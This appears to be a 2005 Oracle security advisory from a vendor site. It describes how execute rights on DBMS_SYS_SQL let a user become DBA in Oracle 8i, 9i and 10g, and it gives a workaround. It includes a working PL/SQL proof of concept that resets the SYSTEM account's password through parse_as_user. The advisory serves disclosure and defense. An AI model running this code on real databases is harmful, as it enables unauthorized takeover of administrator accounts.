Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g
Details The following test case is from Oracle itself. A test case is nothing else than an exploit or proof of concept code. This test case allows to become DBA if the permission on DBMS_SYS_SQL are granted . By default only XDB has execute permission. Sometimes PORTAL30, PORTAL30_SSO and OAS_PUBLIC has also execute permission on DBMS_SYS_SQL. Metalink note 112271.1 gives the following advice: grant execute privileges on DBMS_SYS_SQL to the (default user) OAS_PUBLIC. BE CAREFUL DOING THIS... Workarounds Never grant DBMS_SYS_SQL to public; Example declare uid number; sqltext varchar2(100) := 'alter user system identified by hacker'; myint integer; begin select user_id into uid from all_users where username like 'SYSTEM'; myint:=sys.dbms_sys_sql.open_cursor(); sys.dbms_sys_sql.parse_as_user(myint,sqltext,dbms_sql.native,UID); sys.dbms_sys_sql.close_cursor(myint); end ; / Patch Information No patch required. Never grant DBMS_SYS_SQL to public. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |